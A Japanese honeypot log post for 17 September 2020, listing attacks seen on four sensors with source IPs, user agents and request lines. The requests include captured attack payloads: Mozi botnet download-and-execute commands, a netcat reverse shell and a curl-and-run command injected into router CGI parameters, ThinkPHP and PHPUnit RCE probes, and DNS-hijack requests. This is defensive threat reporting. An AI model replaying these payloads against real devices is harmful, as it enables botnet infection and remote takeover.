2020/09/17 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2020/09/17分です。

特徴

Location：JP

GoAhead IP Cameraの脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス
Gh0stRATのような動き
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//115[.]98[.]144[.]77:57903/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：US

GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
D-link製品へDNS hijackingを狙うアクセス
zgrabによるスキャン行為
ZmEuによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//115[.]98[.]181[.]69:39300/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//115[.]99[.]12[.]120:47894/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

cd /tmp;
rm -rf *;
wget http[:]//27[.]6[.]13[.]218:54465/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：UK

Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//116[.]72[.]83[.]20:59457/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

Location：SG

DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//27[.]5[.]43[.]20:35330/Mozi.a;
chmod 777 Mozi.a;
/tmp/Mozi.a jaws

他

アクセス数推移

JP：総アクセス数：23 (前日比：-6)
US：総アクセス数：365 (前日比：+213)
UK：総アクセス数：17 (前日比：-126)
SG：総アクセス数：227 (前日比：+71)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	27.5.23.171	India
5	45.146.164.186	Russia
1	45.148.10.28	Italy
1	47.108.25.227	China
1	60.243.122.77	India
1	66.240.205.34	United States
3	89.248.166.183	Netherlands
1	111.229.240.235	China
1	115.97.111.58	India
1	115.98.144.77	India
1	139.205.177.99	China
1	180.149.125.171	Mongolia
4	185.142.236.40	Netherlands
1	192.241.238.229	United States

UserAgent一覧

件数	UserAgent
10	-
1	Hello, world
1	Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488)
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1	Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)
1	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
1		Gh0st\xad
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/Public/home/appjs/Index.js	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
1	GET	/c/	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/ftptest.cgi?loginuse=&loginpas=	HTTP/1.1\n
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/set_ftp.cgi?loginuse=&loginpas=&next_url=ftp.htm&port=21&user=ftp&pwd=ftp&dir=/&mode=PORT&upload_interval=0&svr=%24%28nc+89.248.166.183+1245+-e+%2Fbin%2Fsh%29	HTTP/1.1\n
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//115[.]97[.]111[.]58:57784/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]98[.]144[.]77:57903/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	login.cgi	HTTP/1.1
2	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	27.6.13.218	India
1	27.7.176.244	India
10	45.146.164.186	Russia
1	60.243.231.104	India
1	62.4.21.162	France
26	89.248.174.11	Netherlands
1	101.0.34.245	India
12	103.141.104.10	Indonesia
1	115.98.181.69	India
1	115.99.12.120	India
1	125.99.244.132	India
1	167.172.44.231	United States
1	180.149.125.168	Mongolia
305	192.19.231.250	United States
1	192.241.234.4	United States
1	202.83.44.192	India

UserAgent一覧

件数	UserAgent
320	-
1	Hello, World
3	Hello, world
10	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 zgrab/0.x
26	ZmEu
1	curl/7.58.0
1	gSOAP/2.8

リクエスト内容一覧

件数	Method	Request	Protocol
1	%00	%00 %00/%00
2	ABCD	/	HTTP/1.1
1	ABCD	ABCD	HTTP/1.1
3	ABCD	HTTP/1.1
1	BDMT	/index.html	HTTP/6.7
2	CONNECT	HTTP/1.1
1	GET	/../../../../../../../../../../../	HTTP/1.1
1	GET	/../../..//index.html	HTTP/1.0
1	GET	/..//index.html	HTTP/1.1
1	GET	/../index.html
1	GET	/../index.html	HTTP/1.1
1	GET	/../index.html	HTTP/6.7
1	GET	/../index.html	HTTP/1.0
1	GET	/.env	HTTP/1.1
1	GET	/////index.html	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/BlackCatCMS/	HTTP/1.1
1	GET	/Collabtive/	HTTP/1.1
1	GET	/Concrete5/	HTTP/1.1
1	GET	/CubeCart/	HTTP/1.1
1	GET	/DokuWiki/	HTTP/1.1
1	GET	/GLPI/	HTTP/1.1
1	GET	/HumHub/	HTTP/1.1
1	GET	/Joomla/	HTTP/1.1
1	GET	/MODX/	HTTP/1.1
1	GET	/MODx/	HTTP/1.1
1	GET	/Magento/	HTTP/1.1
2	GET	/MyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/OpenDocMan/	HTTP/1.1
1	GET	/PHPMYADMIN/scripts/setup.php	HTTP/1.1
1	GET	/PivotX/	HTTP/1.1
1	GET	/PrestaShop/	HTTP/1.1
1	GET	/PyroCMS/	HTTP/1.1
1	GET	/ResourceSpace/	HTTP/1.1
1	GET	/Serendipity/	HTTP/1.1
1	GET	/SugarCE/	HTTP/1.1
1	GET	/TestLink/	HTTP/1.1
1	GET	/WebCalendar/	HTTP/1.1
1	GET	/\./index.html	HTTP/6.7
1	GET	/\./index.html
2	GET	/\./index.html	HTTP/1.1
1	GET	/_vti_bin/	HTTP/1.1
1	GET	/_vti_cnf/	HTTP/1.1
1	GET	/_vti_log/	HTTP/1.1
1	GET	/_vti_pvt/	HTTP/1.1
1	GET	/achievo/	HTTP/1.1
1	GET	/adaptcms/	HTTP/1.1
1	GET	/ajaxplorer/	HTTP/1.1
1	GET	/appRain/	HTTP/1.1
1	GET	/apprain/	HTTP/1.1
1	GET	/asp/	HTTP/1.1
1	GET	/assets/	HTTP/1.1
1	GET	/assets/images/	HTTP/1.1
1	GET	/b2evolution/	HTTP/1.1
1	GET	/bad397	HTTP/1.1
1	GET	/bad397/	HTTP/1.1
1	GET	/blackcatcms/	HTTP/1.1
1	GET	/c/	HTTP/1.1
1	GET	/cart/	HTTP/1.1
1	GET	/cerb/	HTTP/1.1
1	GET	/cgi-bin-sdb/	HTTP/1.1
1	GET	/cgi-bin/	HTTP/1.1
12	GET	/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22	HTTP/1.0
1	GET	/cgi/	HTTP/1.1
1	GET	/cgi_bin/	HTTP/1.1
1	GET	/cms/	HTTP/1.1
1	GET	/codoforum/	HTTP/1.1
1	GET	/collab/	HTTP/1.1
1	GET	/collaborate/	HTTP/1.1
1	GET	/collabtive/	HTTP/1.1
1	GET	/common/	HTTP/1.1
1	GET	/community/	HTTP/1.1
1	GET	/concrete5/	HTTP/1.1
1	GET	/confluence/	HTTP/1.1
1	GET	/cubecart/	HTTP/1.1
1	GET	/dapewfnsw1_dyl/	HTTP/1.1
1	GET	/database/scripts/setup.php	HTTP/1.1
1	GET	/db/scripts/setup.php	HTTP/1.1
1	GET	/dbadmin/scripts/setup.php	HTTP/1.1
1	GET	/dnscfg.cgi?dnsPrimary=149.56.152.185&dnsSecondary8.8.4.4&dnsDynamic=0&dnsRefresh=1	HTTP/1.1
1	GET	/doc/	HTTP/1.1
1	GET	/doc/packages/	HTTP/1.1
1	GET	/dokuwiki/	HTTP/1.1
1	GET	/dolibarr/	HTTP/1.1
1	GET	/doorgets/	HTTP/1.1
1	GET	/drupal/	HTTP/1.1
1	GET	/e107/	HTTP/1.1
1	GET	/eFront/	HTTP/1.1
1	GET	/efront/	HTTP/1.1
1	GET	/f5sqosds8e5h1/	HTTP/1.1
1	GET	/false_37207	HTTP/1.1
1	GET	/false_37207/	HTTP/1.1
1	GET	/fastcgi/	HTTP/1.1
1	GET	/flyspray/	HTTP/1.1
1	GET	/forum/	HTTP/1.1
1	GET	/glpi/	HTTP/1.1
1	GET	/guia-negocios/	HTTP/1.1
1	GET	/helpdezk-community/	HTTP/1.1
1	GET	/helpdezk/	HTTP/1.1
1	GET	/hrm/	HTTP/1.1
1	GET	/html/	HTTP/1.1
1	GET	/humhub/	HTTP/1.1
1	GET	/icehrm/	HTTP/1.1
1	GET	/images/	HTTP/1.1
1	GET	/img/	HTTP/1.1
3	GET	/index.html
17	GET	/index.html	HTTP/1.1
2	GET	/index.html	HTTP/6.7
1	GET	/index.html	HTTP/0.9
1	GET	/index.html	QUALYS/1.1
1	GET	/index.html	HTTP/rndmmtd
1	GET	/index.html	HTTP/1.1rndmmtd
1	GET	/index.html	HTTP/6.7rndmmtd
1	GET	/index.html	HTTP/0.0
4	GET	/index.html	HTTP/1.0
1	GET	/index.html	HTTP/QUALYS
2	GET	/index.html	HTTP/1.2
3	GET	/index.html rndmmtd
1	GET	/index.html..........	HTTP/6.7
1	GET	/index.html..............	HTTP/1.1
1	GET	/index.html?advbjhvyivov	HTTP/1.1
1	GET	/index.html?rndmmtd	HTTP/1.1
1	GET	/index.html?test	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
2	GET	/ivwgzvlg0a/	HTTP/1.1
1	GET	/j67ud1ohxh591/	HTTP/1.1
1	GET	/jbyi_0_3_/	HTTP/1.1
1	GET	/jh_kowsx9x9b/	HTTP/1.1
1	GET	/joomla/	HTTP/1.1
1	GET	/khu2f8afsrj/	HTTP/1.1
1	GET	/liferay/	HTTP/1.1
1	GET	/login/	HTTP/1.1
1	GET	/magento/	HTTP/1.1
1	GET	/mail/	HTTP/1.1
1	GET	/manager/	HTTP/1.1
1	GET	/manual/	HTTP/1.1
1	GET	/manual/images/	HTTP/1.1
1	GET	/mediawiki/	HTTP/1.1
1	GET	/microweber/	HTTP/1.1
1	GET	/modx/	HTTP/1.1
1	GET	/moodle/	HTTP/1.1
1	GET	/movabletype/	HTTP/1.1
4	GET	/mujxpf9qfrie2i5mddq	HTTP/1.1
1	GET	/mujxpf9qfrie2i5mddq	HTTP/6.7
1	GET	/mujxpf9qfrie2i5mddq	HTTP/1.0
1	GET	/mujxpf9qfrie2i5mddq
1	GET	/mujxpf9qfrie2i5mddq/../index.html	HTTP/1.1
1	GET	/my/scripts/setup.php	HTTP/1.1
1	GET	/myadmin/scripts/setup.php	HTTP/1.1
1	GET	/mybb/	HTTP/1.1
1	GET	/mysql/scripts/setup.php	HTTP/1.1
1	GET	/mysqladmin/scripts/setup.php	HTTP/1.1
2	GET	/nbr032b_j_l/	HTTP/1.1
1	GET	/news/	HTTP/1.1
1	GET	/ob3w_m87j/	HTTP/1.1
1	GET	/odm/	HTTP/1.1
1	GET	/ok09pi4y4so/	HTTP/1.1
1	GET	/ooiqow30sq8m/	HTTP/1.1
1	GET	/opendocman/	HTTP/1.1
1	GET	/opensourcepos/	HTTP/1.1
1	GET	/ownCloud/	HTTP/1.1
1	GET	/owncloud/	HTTP/1.1
1	GET	/pHpMyAdMiN/scripts/setup.php	HTTP/1.1
1	GET	/perl/	HTTP/1.1
1	GET	/php/	HTTP/1.1
1	GET	/phpAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpBB/	HTTP/1.1
1	GET	/phpBB3/	HTTP/1.1
1	GET	/phpMyAdmin-2/scripts/setup.php	HTTP/1.1
1	GET	/phpMyAdmin/	HTTP/1.1
1	GET	/phpMyAdmin/scripts/db.init.php	HTTP/1.1
1	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/phpadmin/scripts/setup.php	HTTP/1.1
1	GET	/phpbb/	HTTP/1.1
1	GET	/phpbb3/	HTTP/1.1
1	GET	/phpgb/	HTTP/1.1
1	GET	/phpmyadmin/	HTTP/1.1
1	GET	/phpmyadmin/scripts/db.init.php	HTTP/1.1
1	GET	/phpmyadmin/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin1/scripts/setup.php	HTTP/1.1
1	GET	/phpmyadmin2/scripts/setup.php	HTTP/1.1
1	GET	/phpnuke/	HTTP/1.1
1	GET	/phpwcms/	HTTP/1.1
1	GET	/pivotx/	HTTP/1.1
1	GET	/pligg-cms/	HTTP/1.1
1	GET	/pligg/	HTTP/1.1
1	GET	/pma/scripts/setup.php	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/postnuke/	HTTP/1.1
1	GET	/prestashop/	HTTP/1.1
1	GET	/project/	HTTP/1.1
1	GET	/projekt/	HTTP/1.1
1	GET	/pub/	HTTP/1.1
1	GET	/pydio/	HTTP/1.1
1	GET	/pyrocms/	HTTP/1.1
1	GET	/q9kn5dunk/	HTTP/1.1
1	GET	/r7ioc58x5gilw/	HTTP/1.1
1	GET	/recipe/	HTTP/1.1
1	GET	/recipe/assets/	HTTP/1.1
1	GET	/recipe/recipe/	HTTP/1.1
1	GET	/redaxscript/	HTTP/1.1
2	GET	/rendkaejhlckn8/	HTTP/1.1
1	GET	/resourcespace/	HTTP/1.1
2	GET	/rnvtolo9pm/	HTTP/1.1
1	GET	/samples/	HTTP/1.1
1	GET	/scripts/	HTTP/1.1
1	GET	/scripts/setup.php	HTTP/1.1
1	GET	/serendipity/	HTTP/1.1
1	GET	/servlet/	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/setup.php	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]98[.]181[.]69:39300/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//115[.]99[.]12[.]120:47894/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]6[.]13[.]218:54465/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/snzbcxfdhdk/	HTTP/1.1
1	GET	/social/	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/spip/	HTTP/1.1
1	GET	/sqladm/scripts/setup.php	HTTP/1.1
1	GET	/sqladmin/scripts/setup.php	HTTP/1.1
1	GET	/storage/	HTTP/1.1
1	GET	/sugarce/	HTTP/1.1
1	GET	/sugarcrm/	HTTP/1.1
1	GET	/test/	HTTP/1.1
1	GET	/testlink/	HTTP/1.1
1	GET	/tikiwiki/	HTTP/1.1
1	GET	/tv9h3z4t9d/	HTTP/1.1
1	GET	/twiki/	HTTP/1.1
1	GET	/typo3/	HTTP/1.1
1	GET	/typo3/typo3/	HTTP/1.1
1	GET	/ugi7s50u/	HTTP/1.1
1	GET	/usemod/	HTTP/1.1
1	GET	/usr/doc/	HTTP/1.1
1	GET	/vTigerCRM/	HTTP/1.1
1	GET	/vcms/	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/vncviewer.jar	HTTP/1.1
1	GET	/vohthw32/	HTTP/1.1
1	GET	/vtigercrm/	HTTP/1.1
1	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wacko/	HTTP/1.1
1	GET	/wbce/	HTTP/1.1
1	GET	/webcalendar/	HTTP/1.1
1	GET	/webmail/	HTTP/1.1
1	GET	/wiki/	HTTP/1.1
1	GET	/wikka/	HTTP/1.1
1	GET	/wolfcms/	HTTP/1.1
1	GET	/wordpress/	HTTP/1.1
1	GET	/wordpress/wp-content/plugins/	HTTP/1.1
1	GET	/wp-content/plugins/	HTTP/1.1
1	GET	/wp/	HTTP/1.1
2	GET	/wrgeu5ecd13va/	HTTP/1.1
1	GET	/xoops/	HTTP/1.1
1	GET	/ytnzrxp5b/	HTTP/1.1
1	GET	/yuy24k3/	HTTP/1.1
1	GET	/z1c6we9/	HTTP/1.1
2	GET	/z3n7m2s98gtx1x/	HTTP/1.1
1	GET	/zen-cart/	HTTP/1.1
1	GET	/zencart/	HTTP/1.1
2	GET	HTTP/1.1
2	GET	http://83[.]118[.]68[.]34.bc.googleusercontent.com:80/index.html	HTTP/1.1
1	GET	http[:]//Qualys[.]null/	HTTP/1.0
1	GET/index.html	HTTP/1.1
1	GET/mujxpf9qfrie2i5mddq	HTTP/1.1
1	HEA	/index.html	HTTP/1.1
1	HEAD	/	HTTP/1.0
2	HEAD	/index.html	HTTP/1.1
2	HEAD	/index.html	HTTP/1.0
1	HEAD	/index.html
1	HEAD	/index.html	HTTP/0.9
1	HEAD	/mujxpf9qfrie2i5mddq	HTTP/1.1
1	HEAD	/mujxpf9qfrie2i5mddq	HTTP/2.0
1	HEAD	/selfupdate/wuident.cab	HTTP/1.0
1	If-Match:	*
1	OPTIONS	/	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
2	OPTIONS	/index.html	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
3	POST	/HNAP1/	HTTP/1.0
2	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/index.html	HTTP/1.0
1	POST	/index.html	QUALYS/1.1
2	POST	/index.html	HTTP/1.1
1	POST	/mujxpf9qfrie2i5mddq	HTTP/1.1
1	POST	/mujxpf9qfrie2i5mddq?rndmmtd	HTTP/1.1
1	POST	/sdk/vimService	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	PROPFIND	/	HTTP/1.1
2	QUALYS	/	HTTP/1.1
1	RNDMMTD	/index.html	HTTP/1.0
1	SEARCH	/	HTTP/1.1
1	TRACE	/	HTTP/1.1
2	get	/index.html	HTTP/1.1
2	get	/index.html	HTTP/1.0
1	rndmmtd	/	HTTP/1.1
1	rndmmtd	/index.html	HTTP/1.0
1	rndmmtd	/index.html	HTTP/1.1
1	rndmmtd	/mujxpf9qfrie2i5mddq	HTTP/1.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	27.7.30.89	India
1	45.12.115.130	France
8	45.146.164.186	Russia
1	59.30.12.254	South Korea
1	61.219.11.153	Taiwan
1	65.52.207.171	United States
1	116.72.83.20	India
1	116.75.107.251	India
1	162.243.128.160	United States
1	180.149.125.167	Mongolia

UserAgent一覧

件数	UserAgent
5	-
1	Hello, world
8	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
1	Mozilla/5.0 zgrab/0.x

リクエスト内容一覧

件数	Method	Request	Protocol
1		-
1	GET	/.env	HTTP/1.1
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/c/	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//116[.]75[.]107[.]251:60565/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//116[.]72[.]83[.]20:59457/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
2	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.203.161.58	China
1	27.5.43.20	India
1	45.12.115.130	France
9	45.146.164.186	Russia
1	45.148.10.28	Italy
2	87.251.75.254	Russia
3	89.248.172.90	Netherlands
1	94.20.64.42	Azerbaijan
101	121.235.145.234	China
1	125.82.37.158	China
1	159.18.94.65	Canada
2	170.106.38.36	Singapore
1	180.149.125.166	Mongolia
1	192.241.215.210	United States
101	221.227.40.252	China

UserAgent一覧

件数	UserAgent
9	-
1	Hello, world
202	Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
9	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
1	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28 (.NET CLR 3.5.30729)
1	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1	Mozilla/5.0 zgrab/0.x
1	XTC
1	XTC BOTNET

リクエスト内容一覧

件数	Method	Request	Protocol
2		-
2		\x03
2		\x16\x03\x01
2	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
2	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/c/	HTTP/1.1
2	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP	HTTP/1.1
202	GET	/phpmyadmin/	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//27[.]5[.]43[.]20:35330/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws	HTTP/1.1
2	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	http[:]//httpheader[.]net/azenv.php	HTTP/1.1
1	HEAD	/robots.txt	HTTP/1.0
1	OPTIONS	*	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
2	POST	/cgi-bin/mainfunction.cgi	HTTP/1.1